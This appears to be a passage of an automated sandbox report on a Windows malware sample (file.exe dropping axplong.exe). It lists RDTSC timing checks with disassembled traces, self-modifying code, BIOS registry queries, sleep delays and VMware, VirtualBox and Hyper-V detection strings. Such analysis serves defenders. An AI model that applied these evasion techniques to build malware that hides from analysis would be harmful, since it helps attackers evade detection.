Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0919 second address: 4FB094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 mov ah, dl 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB80D16EFE2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB094A second address: 4FB094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB094E second address: 4FB0954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0954 second address: 4FB0965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA387Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40F2D second address: 4F40F3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40F3C second address: 4F40F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40F42 second address: 4F40F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40F46 second address: 4F40F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB80CDA387Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40F66 second address: 4F40FB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, ebx 0x00000010 pushfd 0x00000011 jmp 00007FB80D16EFE9h 0x00000016 add ah, 00000016h 0x00000019 jmp 00007FB80D16EFE1h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40FB7 second address: 4F40FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0CBA second address: 4FB0CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0CD2 second address: 4FB0CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0CD6 second address: 4FB0D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB80D16EFDEh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx esi, di 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB80D16EFDBh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0D02 second address: 4FB0D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0D1A second address: 4FB0D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FB80D16EFE7h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB80D16EFDBh 0x0000001c xor si, BC7Eh 0x00000021 jmp 00007FB80D16EFE9h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FB80D16EFE0h 0x0000002d adc cx, 2F78h 0x00000032 jmp 00007FB80D16EFDBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0D90 second address: 4FB0DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push A4570ED1h 0x0000000e pushad 0x0000000f jmp 00007FB80CDA387Dh 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 add dword ptr [esp], 5BA9F131h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB80CDA3886h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0DE3 second address: 4FB0DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6DAB second address: 11C6DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6048A second address: 4F60490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60490 second address: 4F60509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FB80CDA3886h 0x00000013 mov ebp, esp 0x00000015 jmp 00007FB80CDA3880h 0x0000001a push FFFFFFFEh 0x0000001c jmp 00007FB80CDA3880h 0x00000021 push 122F318Dh 0x00000026 jmp 00007FB80CDA3881h 0x0000002b add dword ptr [esp], 64C98E8Bh 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov dx, si 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60509 second address: 4F60590 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB80D16EFE6h 0x00000008 sub cl, FFFFFFF8h 0x0000000b jmp 00007FB80D16EFDBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov bh, ah 0x00000015 popad 0x00000016 push 4D6FBD1Ah 0x0000001b pushad 0x0000001c jmp 00007FB80D16EFDEh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB80D16EFE0h 0x00000028 sbb eax, 6EBC4288h 0x0000002e jmp 00007FB80D16EFDBh 0x00000033 popfd 0x00000034 movzx ecx, dx 0x00000037 popad 0x00000038 popad 0x00000039 xor dword ptr [esp], 3B80131Ah 0x00000040 jmp 00007FB80D16EFDBh 0x00000045 mov eax, dword ptr fs:[00000000h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60590 second address: 4F60596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60596 second address: 4F6059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6059B second address: 4F605CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FB80CDA3880h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB80CDA387Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F605CD second address: 4F60621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB80D16EFE1h 0x00000008 pop ecx 0x00000009 mov si, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 jmp 00007FB80D16EFE3h 0x00000015 sub esp, 1Ch 0x00000018 jmp 00007FB80D16EFE6h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push edi 0x00000022 pop eax 0x00000023 mov ebx, 4D6B067Ch 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60621 second address: 4F60677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 40857F44h 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 movsx edi, ax 0x00000016 popad 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 jmp 00007FB80CDA387Eh 0x0000001e xchg eax, esi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007FB80CDA387Ch 0x00000028 xor si, 6328h 0x0000002d jmp 00007FB80CDA387Bh 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60677 second address: 4F606A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bh, ah 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FB80D16EFDEh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB80D16EFE7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F606A9 second address: 4F606C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F606C1 second address: 4F60744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e mov cx, dx 0x00000011 popad 0x00000012 mov si, bx 0x00000015 popad 0x00000016 mov dword ptr [esp], edi 0x00000019 jmp 00007FB80D16EFE3h 0x0000001e mov eax, dword ptr [76FAB370h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FB80D16EFDBh 0x0000002c sbb cx, 2D3Eh 0x00000031 jmp 00007FB80D16EFE9h 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FB80D16EFE0h 0x0000003d xor ecx, 79477A38h 0x00000043 jmp 00007FB80D16EFDBh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60744 second address: 4F60824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB80CDA387Fh 0x00000009 jmp 00007FB80CDA3883h 0x0000000e popfd 0x0000000f push esi 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a pushfd 0x0000001b jmp 00007FB80CDA387Ch 0x00000020 sub eax, 339E1EF8h 0x00000026 jmp 00007FB80CDA387Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xor eax, ebp 0x0000002f pushad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FB80CDA387Bh 0x00000037 adc al, FFFFFFBEh 0x0000003a jmp 00007FB80CDA3889h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007FB80CDA3880h 0x00000046 jmp 00007FB80CDA3885h 0x0000004b popfd 0x0000004c popad 0x0000004d movzx esi, di 0x00000050 popad 0x00000051 push edx 0x00000052 jmp 00007FB80CDA3888h 0x00000057 mov dword ptr [esp], eax 0x0000005a jmp 00007FB80CDA3880h 0x0000005f lea eax, dword ptr [ebp-10h] 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 movsx edi, si 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60824 second address: 4F6084A instructions: 0x00000000 rdtsc 0x00000002 mov si, 5BCBh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f jmp 00007FB80D16EFDEh 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6084A second address: 4F6084E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6084E second address: 4F60854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60854 second address: 4F60872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007FB80CDA387Fh 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60872 second address: 4F608D4 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c call 00007FB80D16EFDDh 0x00000011 mov ecx, 4FD62657h 0x00000016 pop ecx 0x00000017 call 00007FB80D16EFDDh 0x0000001c mov eax, 12575347h 0x00000021 pop esi 0x00000022 popad 0x00000023 jne 00007FB87F0BE455h 0x00000029 jmp 00007FB80D16EFE3h 0x0000002e sub eax, eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB80D16EFE2h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F608D4 second address: 4F608E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA387Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F608E6 second address: 4F60936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-20h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FB80D16EFE2h 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FB80D16EFDCh 0x00000020 jmp 00007FB80D16EFE5h 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60936 second address: 4F60982 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 53A4AAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebx, dword ptr [esi] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB80CDA3888h 0x00000013 jmp 00007FB80CDA3885h 0x00000018 popfd 0x00000019 mov ax, 7997h 0x0000001d popad 0x0000001e mov dword ptr [ebp-24h], ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov eax, edi 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60982 second address: 4F6099F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB80D16EFDEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6099F second address: 4F609A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F609A5 second address: 4F609A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 15F1F3 second address: 15F220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FB80CDA3885h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 15F220 second address: 15EAD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB80D16EFD6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jnp 00007FB80D16EFDCh 0x00000015 push dword ptr [ebp+122D0C71h] 0x0000001b add dword ptr [ebp+122D19E1h], edi 0x00000021 call dword ptr [ebp+122D281Dh] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D19F7h], edi 0x0000002e xor eax, eax 0x00000030 cld 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jne 00007FB80D16EFE2h 0x0000003b je 00007FB80D16EFDCh 0x00000041 mov dword ptr [ebp+122D386Eh], eax 0x00000047 or dword ptr [ebp+122D18EDh], esi 0x0000004d mov esi, 0000003Ch 0x00000052 stc 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FB80D16EFE3h 0x0000005c or dword ptr [ebp+122D18EDh], ecx 0x00000062 lodsw 0x00000064 mov dword ptr [ebp+122D3467h], esi 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e stc 0x0000006f add dword ptr [ebp+122D1984h], eax 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 clc 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FB80D16EFDBh 0x00000082 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D18AE second address: 2D18CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FB80CDA387Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D18CF second address: 2D18D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D0865 second address: 2D0889 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB80CDA3878h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB80CDA387Ch 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FB80CDA3876h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D0889 second address: 2D0892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D0892 second address: 2D0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D09F1 second address: 2D09F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D0BF6 second address: 2D0BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 2D432A second address: 2D43AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FB80D16EFD8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jne 00007FB80D16EFDCh 0x0000002c jo 00007FB80D16EFDBh 0x00000032 adc si, 257Bh 0x00000037 push 00000000h 0x00000039 mov ecx, dword ptr [ebp+122D17FAh] 0x0000003f push 59D5A356h 0x00000044 push eax 0x00000045 push edx 0x00000046 jne 00007FB80D16EFEDh 0x0000004c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 101EA89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 101EB2C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11BCC1F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 12493CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 15EA89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 15EB2C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 2FCC1F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 3893CA instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04FB0C8C rdtsc

0_2_04FB0C8C

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1137	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1242	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1170	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1243	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664	Thread sleep time: -72036s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7648	Thread sleep count: 1137 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7648	Thread sleep time: -2275137s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7624	Thread sleep count: 422 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7624	Thread sleep time: -12660000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7744	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7636	Thread sleep count: 1242 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7636	Thread sleep time: -2485242s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7640	Thread sleep count: 1170 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7640	Thread sleep time: -2341170s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660	Thread sleep count: 1109 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660	Thread sleep time: -2219109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7652	Thread sleep count: 1243 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7652	Thread sleep time: -2487243s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2124185723.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&(
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
